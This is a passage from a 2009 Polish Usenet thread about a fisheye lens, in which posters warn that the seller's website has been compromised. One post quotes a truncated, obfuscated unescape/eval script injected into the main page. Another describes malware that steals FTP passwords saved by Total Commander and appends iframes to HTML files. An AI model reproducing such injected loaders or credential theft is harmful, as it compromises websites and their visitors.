  • 11. Data: 2009-06-13 13:53:06
    Temat: Re: Samyang 8mm f/3.5 Asph IF MC Fisheye
    Od: Grzegorz Krukowski <r...@o...pl>

    On Sat, 13 Jun 2009 15:45:40 +0200, Grzegorz Krukowski
    <r...@o...pl> wrote:

    >On Fri, 12 Jun 2009 11:20:48 +0200, "TheGuru" <t...@o...pl> wrote:
    >
    >Tej toner, ktoś wam się dokleił do strony, chińczyk jakiś ;)

    A oto robaczek, na samiuskiej głównej stronie:

    <script language=javascript><!--
    (function(unEnE){var
    HqvXi=unescape(('var,20a,3d,22u,....).replace(unEnE,
    '%'));eval(HqvXi)})(/,/g);
    --></script>

    --
    Kiedyś publikacja zdjęć w internecie wymagała odwagi...
    dziś wystarczy aparat cyfrowy ;) (c)Billy the Fish

  • 12. Data: 2009-06-13 14:49:14
    Od: dominik <n...@d...kei.pl>

    TheGuru wrote:

    > wiem, coś z heurystyką nie tak albo skrypty sklepu sa źle rozpoznawane.
    > admin już nad tym pracuje......
    >
    > katalog /foto jest 'czysty' nic tam nie ma po za singapore

    Ostatnio widziałem wyjątkowo brzydkie ustrojstwo, które roznosi się szybko
    po sieci, wyszukuje TC i wyciąga z niego hasła na FTP. Potem łączy się
    samo z nimi, szuka plików html i dokleja do nich jakieś iframe z swoimi
    stronkami. Z nich można zrobić cokolwiek tak naprawdę.
    Może złapałeś i nawet sam nie wiesz?

    d.